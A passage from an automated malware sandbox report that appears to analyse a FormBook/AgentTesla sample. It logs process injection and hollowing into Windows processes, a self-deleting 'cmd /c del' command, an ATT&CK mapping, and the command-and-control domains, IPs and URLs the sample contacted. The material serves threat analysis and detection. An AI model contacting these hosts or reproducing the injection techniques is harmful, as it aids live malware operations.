          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NQQWym075C.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.147.164 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.64 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.112 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.122.148.234 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 65.254.250.119 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NQQWym075C.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQQWym075C.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 3388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 100000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B80000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\NQQWym075C.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E4A008
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
          Source: C:\Users\user\Desktop\NQQWym075C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: explorer.exe, 00000003.00000002.483381434.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NQQWym075C.exeQueries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exeQueries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQQWym075C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information4LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery111Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321308 Sample: NQQWym075C.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 35 www.qzrpxx.com 2->35 37 www.keitakora.com 2->37 39 3 other IPs or domains 2->39 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 2 other signatures 2->55 11 NQQWym075C.exe 1 2->11         started        signatures3 process4 signatures5 71 Maps a DLL or memory area into another process 11->71 14 RegAsm.exe 11->14         started        17 NQQWym075C.exe 11->17         started        process6 signatures7 73 Modifies the context of a thread in another process (thread injection) 14->73 75 Maps a DLL or memory area into another process 14->75 77 Sample uses process hollowing technique 14->77 81 2 other signatures 14->81 19 explorer.exe 14->19 injected 79 Writes to foreign memory regions 17->79 23 RegAsm.exe 17->23         started        process8 dnsIp9 41 www.sabaicraft.com 192.64.147.164, 49743, 80 VOODOO1US United States 19->41 43 thrust-board.com 34.102.136.180, 49728, 49730, 49745 GOOGLEUS United States 19->43 45 14 other IPs or domains 19->45 57 System process connects to network (likely due to code injection or exploit) 19->57 25 wlanext.exe 12 19->25         started        29 cscript.exe 19->29         started        59 Modifies the context of a thread in another process (thread injection) 23->59 61 Maps a DLL or memory area into another process 23->61 63 Sample uses process hollowing technique 23->63 signatures10 process11 dnsIp12 47 www.sz360buy.com 25->47 65 Modifies the context of a thread in another process (thread injection) 25->65 67 Maps a DLL or memory area into another process 25->67 69 Tries to detect virtualization through RDTSC time measurements 25->69 31 cmd.exe 1 25->31         started        signatures13 process14 process15 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NQQWym075C.exe31%VirustotalBrowse
          NQQWym075C.exe48%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          NQQWym075C.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.NQQWym075C.exe.5fe0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          teelinkz.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.sz360buy.com/d0%Avira URL Cloudsafe
          http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sz360buy.com/o56q/?6l=2CtK5nvmO0%Avira URL Cloudsafe
          http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          myreviewandbonuses.com
          		66.235.200.112
          		truetrue
            		unknown
            www.deadroommn.com
            		35.186.238.101
            		truetrue
              		unknown
              teelinkz.com
              		34.102.136.180
              		truetrueunknown
              keitakora.com
              		34.102.136.180
              		truetrue
                		unknown
                www.sz360buy.com
                		160.122.148.234
                		truetrue
                  		unknown
                  ls3xg13085cb982.dlszywz.com
                  		47.91.170.148
                  		truefalse
                    		unknown
                    ext-sq.squarespace.com
                    		198.49.23.141
                    		truefalse
                      		high
                      shops.myshopify.com
                      		23.227.38.64
                      		truetrue
                        		unknown
                        www.tnicholson.design
                        		65.254.250.119
                        		truetrue
                          		unknown
                          thrust-board.com
                          		34.102.136.180
                          		truetrue
                            		unknown
                            www.sabaicraft.com
                            		192.64.147.164
                            		truetrue
                              		unknown
                              www.houseofhawthorn.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.bs600mc.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.ussouthernhome.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.keitakora.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.thrust-board.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.biolineapparel.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.teelinkz.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.not-taboo.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.qzrpxx.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.myreviewandbonuses.com
                                                		unknown
